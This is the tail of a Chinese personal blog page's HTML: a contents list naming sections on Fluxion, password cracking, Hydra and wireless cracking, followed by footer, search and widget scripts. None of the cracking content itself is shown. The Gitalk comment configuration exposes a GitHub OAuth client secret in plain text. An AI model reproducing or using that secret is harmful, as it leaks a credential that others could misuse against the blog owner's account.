class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#10-1-Fluxion下载"><span class="nav-number">9.1.</span> <span class="nav-text">10.1 Fluxion下载</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#十一、密码破解"><span class="nav-number">10.</span> <span class="nav-text">十一、密码破解</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#十二、Hydra"><span class="nav-number">11.</span> <span class="nav-text">十二、Hydra</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#十三、无线破解"><span class="nav-number">12.</span> <span class="nav-text">十三、无线破解</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; 2018 &mdash; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Arron Li</span>

  
</div>


  <div class="powered-by">
    <i class="fa fa-user-md"></i>
    <span id="busuanzi_container_site_pv">
      本站总访问量<span id="busuanzi_value_site_pv"></span>次
    </span>
  </div>

 


  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




<div class="theme-info">
  <div class="powered-by"></div>
  <span class="post-count">本站共36k字</span>
</div>

<script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i> 访问人数
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i> 访问总量
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      次
    </span>
  
</div>








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  














  <link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">
  <script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>

  <script src="/js/src/md5.min.js"></script>

  <script type="text/javascript">
    var gitalk = new Gitalk({
      clientID: 'a22cf34e389580514647',
      clientSecret: '4fb159dd5362d7a3c4c98d565abcad8d53014004',
      repo: 'JackLXJ.github.io',
      owner: 'JackLXJ',
      admin: ['JackLXJ'],
      id: md5(location.pathname),
      distractionFreeMode: 'true'
    })
    gitalk.render('gitalk-container')
  </script>





  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  
  
    <script type="text/x-mathjax-config">
      MathJax.Hub.Config({
        tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
        }
      });
    </script>

    <script type="text/x-mathjax-config">
      MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for (i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
        }
      });
    </script>
    <script type="text/javascript" src="//cdn.bootcss.com/mathjax/2.7.1/latest.js?config=TeX-AMS-MML_HTMLorMML"></script>
  


  

  



  <link rel="stylesheet" href="/dist/APlayer.min.css">
  <div id="aplayer"></div>
  <script type="text/javascript" src="/dist/APlayer.min.js"></script>
  <script type="text/javascript" src="/dist/music.js"></script>
  
<script src="/live2dw/lib/L2Dwidget.min.js?0c58a1486de42ac6cc1c59c7d98ae887"></script><script>L2Dwidget.init({"model":{"jsonPath":"/live2dw/assets/miku.model.json"},"display":{"position":"left","width":150,"height":300},"mobile":{"show":true},"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/clicklove.js"></script>

<!--崩溃欺骗-->
<script type="text/javascript" src="/js/src/crash_cheat.js"></script>